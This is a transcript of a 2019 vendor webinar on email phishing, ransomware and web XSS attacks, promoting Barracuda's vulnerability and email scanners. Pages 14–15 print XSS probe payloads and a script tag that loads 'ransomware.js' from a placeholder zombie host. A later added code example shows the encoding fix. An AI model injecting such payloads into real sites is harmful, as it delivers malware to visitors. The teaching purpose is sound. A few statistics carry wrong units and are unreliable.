“Latest Security Threat Research…and How To Protect Yourself” 11 - 19 - 2019
Transcript
Page 1: “Latest Security Threat Research…and How To Protect Yourself” · • Sh Audio –In presentation mode until end Control Panel View webinar in full screen mode Feel Free to submit

“Latest Security Threat Research…and How To Protect Yourself”

11-19-2019

Page 2

Agenda

• Welcome and Introductions – Chris Riley

• Shawn Duffy, Principal, Duffy Compliance Services

  • Email Phishing Attacks

  • Web XSS Attacks

• Courtney Vick, Territory Manager – Barracuda

Page 3

During the Webinar…

• Audio – In presentation mode until end

• Control Panel

• View webinar in full screen mode

• Feel Free to submit written questions

• Open Q & A at the end (please raise your hand & we will unmute your line)

• Survey at conclusion of webinar

Page 4

We Hope You are Enjoying Your Pizza!!

Please double check with your receptionist, then contact Mike Jones: [email protected] We will research and replace with an e-card

(We are recording the webinar – so don’t think twice about stepping away for a few minutes to go pick it up at your front desk!)

Page 5

System Source is a regional systems integrator. We have the people, processes and tools to help clients improve, maintain and acquire IT and Audio-Visual systems.

• We help IMPROVE IT operations. Clients ask us to train their staff for more productivity or rent our classrooms for private classes.

• We design PRESENTATION rooms, including collaborative conference rooms and classrooms.

• IMPROVING IT often requires top CONSULTANTS.

Page 6

Shawn Duffy, Duffy Compliance Services

Page 7

Email

• Social Media profiling

• Phishing

• Ransomware

Page 8

Social Media profiling

• What sites are you active on?

• What are you sharing? (images, memes)

• What are you chatting about?

• Are you looking for a job?

• Are you looking for a relationship?

• Your or someone’s health status

• Collect names of Pets & Family members

• Vacation times and destinations

• Passions (e.g., politics, religion)

Page 9

Phishing

Page 10

Ransomware

Cyber Extortion

• Uses strong encryption

• Payment via Bitcoin

• Plenty of Variants

Page 11

Web Application - XSS

• Reflective: Non-Persistent XSS Technique

• Stored: Persistent XSS Technique

• DOM: Client side Technique

Page 12

Barracuda Vulnerability Manager

https://bvm.barracudanetworks.com/login

https://www.../products/vulnerabilitymanager

Page 13

Web Application – Walk thru

• Vulnerable Test Site: http://public.blorpazort.com/

Page 14

Web Application – Test Results

• Barracuda Vulnerability Scan

• Partial Results for #5

http://public.blorpazort.com/pages/xss_parsing_test.php
The url parameter was submitted with the value "--><script>prompt(12345)</script>OCo9e<!--, and the string was echoed verbatim in the output.

http://public.blorpazort.com/pages/page_header_inject.php
The fname parameter was submitted with the value <script>prompt(12345)</script>v5Kh3, and the string was echoed verbatim in the output.

http://public.blorpazort.com/pages/xss_form_post.php
The search parameter was submitted with the value <script>prompt(12345)</script>nI45u, and the string was echoed verbatim in the output.

Page 15

Web Application – Reflective XSS

Review of http://public.blorpazort.com/pages/xss_form_post.php

<script>prompt(12345)</script>nI45u<img src='https://duffycompliance.com/images/DCS-logo.png' />

<script src="http://<Zombie_IP/malware/ransomware.js"></script>

Page 16

Web Application – Stored XSS

• Review of http://public.blorpazort.com/pages/pager_header_inject.php

• https://google-gruyere.appspot.com/start
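The scan results on the previous pages all say the same thing: a request parameter was "echoed verbatim in the output". The following Node.js snippet is an added example, not code from the webinar, from the test site, or from Barracuda; it shows the defect behind both the reflected finding (a `search` parameter written straight into the page) and the stored variant (saved input rendered for every later visitor), the output-encoding fix for each, and the check a scanner effectively performs: send a marker value and see whether the response contains it unchanged. The function and class names (`renderSearchPageVulnerable`, `CommentStore`, `isEchoedVerbatim`) and the inert marker string are my own; no real framework is used.

```javascript
// Added example: reflected and stored XSS in a tiny server-side renderer,
// the HTML-encoding fix, and the "echoed verbatim" check a scanner relies on.
// All names are hypothetical; the probe string is a constructed inert marker.

// Encode the characters that matter in HTML text and attribute contexts.
// '&' must be replaced first so already-produced entities are not re-encoded.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Reflected XSS: the request parameter is interpolated into the HTML as-is,
// which is exactly what the scan report means by "echoed verbatim".
function renderSearchPageVulnerable(search) {
  return `<html><body><h1>Results for: ${search}</h1></body></html>`;
}

// Fix: encode untrusted input for the context it is written into.
function renderSearchPageFixed(search) {
  return `<html><body><h1>Results for: ${escapeHtml(search)}</h1></body></html>`;
}

// Stored XSS: the same defect, but the input is persisted first and then
// rendered to every visitor, so one submission affects many users.
class CommentStore {
  constructor(encodeOnOutput) {
    this.encodeOnOutput = encodeOnOutput;
    this.comments = [];
  }
  add(text) {
    // Storing raw text is fine; the decision that matters is made at output.
    this.comments.push(text);
  }
  render() {
    return this.comments
      .map(c => `<p>${this.encodeOnOutput ? escapeHtml(c) : c}</p>`)
      .join('\n');
  }
}

// The scanner's check, as the report text describes it: does the response
// contain the submitted marker unchanged? After encoding, '<' and '>' come
// back as '&lt;' and '&gt;', so the check fails and the finding goes away.
function isEchoedVerbatim(responseHtml, marker) {
  return responseHtml.includes(marker);
}

// Constructed marker: contains tag characters but does nothing if rendered.
const PROBE = '<probe>marker-12345</probe>';

// Run the four cases and return the verdicts, before and after the fix.
function demo() {
  const vulnerable = renderSearchPageVulnerable(PROBE);
  const fixed = renderSearchPageFixed(PROBE);
  const storeVuln = new CommentStore(false);
  const storeFixed = new CommentStore(true);
  storeVuln.add(PROBE);
  storeFixed.add(PROBE);
  return {
    reflectedVulnerable: isEchoedVerbatim(vulnerable, PROBE), // true
    reflectedFixed: isEchoedVerbatim(fixed, PROBE),           // false
    storedVulnerable: isEchoedVerbatim(storeVuln.render(), PROBE), // true
    storedFixed: isEchoedVerbatim(storeFixed.render(), PROBE),     // false
  };
}

console.log(demo());
```

`escapeHtml` covers HTML text and quoted-attribute contexts only; a value written into a JavaScript string, a URL, or CSS needs the encoder for that context, and a value used in a DOM sink on the client (the "DOM" technique on page 11) is not fixed by server-side encoding at all.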

Page 17

Web Application – Exploits

Page 18

• System Security Assessments

  • Network, Wireless, and Web Application

• Security Control Evaluations

• Penetration Testing

• Privacy & Cybersecurity (CUI, HIPAA, FISMA, GDPR)

  • Compliance Frameworks (NIST, ISO, CSF, PF)

• Security Policy & Procedure Development

• Gap Analysis & Compliance Audits & DPIA

• Security Remediation Services

Page 19

Courtney Vick, Territory Manager - Barracuda

Page 20

Barracuda – Your journey, secured

Page 21

Fast stats…

• Founded: 2003

• Headquartered in Silicon Valley

• Offices in over 15 countries

• Worldwide employees: 1600+

• Partners: 6500+

• Customers: 150,000+ in over 100 countries

• Revenue FY19: USD 493 million

Page 22

Customers tell us they face these challenges…

Challenge – Why it matters

• Digital transformation – IT becoming differentiator in every function, every industry. Security concerns almost everything you do. Cloud, SaaS is the new way to support business innovation.

• LOFT & FRAG – Trained security resources are a HUGE limiting factor, especially given ever more complex security landscape.

• Protecting data is priority #1 – Customer data ever more valuable, consequences of a breach never greater.

• Evolving threat landscape – Enterprise perimeter has collapsed, attacks more targeted and sophisticated. Email now THE place where most attacks start.

Security matters more than ever

Security is harder to manage than ever

Protecting your data is critical

Yesterday’s technology is no longer good enough

Page 23

Free Vulnerability Scanner

Page 24

What is an application?

• Web App

• Mobile App

• API

Page 25

How is an application secured?

[Diagram: Application, Servers]

Page 26

Trivia

What percentage of apps are protected by WAFs?

Page 27

And the answer is…

Today, fewer than 10%

Page 28

Frequency of Incidents

[Bar chart, incident pattern and count, in the order shown:]

• Payment Card Skimmers – 111

• Crimeware – 140

• Lost and Stolen Assets – 145

• Cyber-Espionage – 171

• Privilege Misuse – 276

• Everything Else – 308

• Point of Sale – 324

• Miscellaneous Errors – 347

• Web Applications – 414

The #1 vector reported in business breaches

Page 29

Web App Threats: the Top Emerging Vector

• Percentage of vulnerabilities that are web-based: 80%

• Percentage of cyberattacks that target web applications: 75%

• Number of malicious ad impressions per year: $12B

• Number of websites defaced in the last five years: $5M

Page 30

Everyone is a Target

• Web exploitation kits available

• Easy to procure

• No expertise required

• They operate like companies

• Can attack thousands of servers in seconds

Page 31

Barracuda Vulnerability Manager

Page 32

Barracuda Vulnerability Manager

• Scan for web application vulnerabilities across entire website

• Granular capability

• Detailed vulnerability scan reports

• Integration with Barracuda Web Application Firewall

• Free service

Page 33

Logging In

• Go to https://bnvlm.barracuda.com and log in with your Cloud Control credentials

Page 34

Easy Identification and Remediation

Page 35

Barracuda WAF Integration

• Import vulnerability report

Page 36

Barracuda WAF Integration

• Remediate with a single click

Page 37

Creating a Scan

• Enter a scan name and the URL you wish to scan

• Click ‘Start Scan’

Page 38

Monitor a Scan

• Scans can take anywhere from 5 minutes to 48 hours depending on size and complexity of the site

• You can see the progress of your scan on the Active Scans tab

Page 39

Viewing Reports

• View completed scans on the Finished Scans page

Page 40

Viewing Reports

• Click ‘Details’ next to a scan for a quick overview of the vulnerabilities found during the scan

• Click ‘Copy’ to start another scan with the same configuration (you can change anything necessary before starting the new scan)

• Click ‘View’ to see the scan report in a browser

• Click ‘Download’ to download the scan report in one of three formats

Page 41

BVM Reports

• We’ll review each component of a Barracuda Vulnerability Manager report:

Page 42

BVM Reports: Vulnerabilities

• There are four severity levels for vulnerabilities:

• Critical: These issues could allow hackers to cause catastrophic problems with the web application, such as disabling it altogether, defacing it, or obtaining access to all of the site’s confidential data.

• High: These issues could allow hackers unauthorized access to certain pieces of data, or access to restricted parts of the site, under certain circumstances.

• Medium: These issues could allow hackers to perform phishing campaigns more easily, or defraud users of your application.

• Low: These issues can cause annoyances and may affect your SEO, but there is no significant risk.

Page 43

BVM Reports: Vulnerabilities

• There are three confidence levels for vulnerabilities:

• Certain: The scanner has confirmed that the vulnerability exists.

• Likely: The scanner is reasonably certain that the vulnerability exists, but it should be confirmed manually.

• Possible: The scanner thinks the vulnerability may exist, but a manual check is required to confirm.

Page 44

Where we shine

Verticals

• Finance / Retail (eCommerce) / Healthcare / Government

Have sensitive data to secure

• Compliance: PCI, HIPAA, GDPR

• Online retail inventory or pricing information

Public cloud

• The most deployed WAF in AWS and Azure

• Near-native integration with cloud platforms

Page 45

Barracuda Email Threat Scanner

Page 46

Targeted attacks start with email

74%

“Almost three quarters of all attacks start with email attachment or a link.”

2017 Threat Landscape Survey: Users on the Front Line - SANS Analyst Program

Page 47

Attacks: Increased complexity every year

[Timeline chart, risk and complexity vs. time, 2000 to 2019: Spam and malware; SOX, HIPAA, FINRA, eDiscovery; Zero-day attacks; Phishing; Brand erosion, email trust; Ransomware; Spear phishing, whaling, BEC, CEO fraud, socially engineered phishing; Unified mobile inboxes and unsecured executive personal accounts; Account takeover (ATO)]

Page 48

The challenge

[Diagram: Internet; Mail server (Firewall, DLP, Backup, Archiving, Sandboxing); Corporate inbox; Employees; Personal email; traffic types: Legitimate email, Spam, Zero day, Spear phishing, ATO]

Page 49

Social engineering bypasses traditional approach

Most email security relies on volume / blacklisting

• IP

• Sender

• Link

• Domain

• Text

Attackers have developed counter-measures

• Zero-day links

• Malicious pages hosted on legitimate domains

• Targeted campaigns

• ATO emails seem “trusted”

Page 50

Email Threat Scanner

https://www.barracuda.com/email_scan

Page 51

Email Threat Scanner benefits

• One time pass of your O365 instance

• Identifies current threats already within the employee inbox

• Produce a report to visualise the business risk

• Support build of business case & further discussions

Page 52

Thank you for attending today!